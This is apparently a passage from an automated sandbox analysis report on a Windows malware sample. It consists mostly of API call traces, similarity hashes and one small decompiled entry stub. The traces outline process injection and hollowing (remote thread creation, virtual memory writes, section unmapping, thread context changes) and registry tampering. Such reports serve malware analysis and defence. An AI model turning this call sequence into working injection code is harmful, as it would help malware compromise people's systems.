    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

Per-line instruction addresses (the report's address column beside the code above, in its original order): 0x00401012, 0x00401014, 0x0040101c, 0x00401026, 0x0040101e, 0x0040101f, 0x0040101f, 0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:479B945127CC75C2A44ED1B13482FB07
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:67591
Initial sample SHA 256:CA5C9DCD28B358A05CF0F3CDA193EB48861E9B0A51E8656C23BE5CAEDF1D2012
Initial sample name:yyy.exe

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
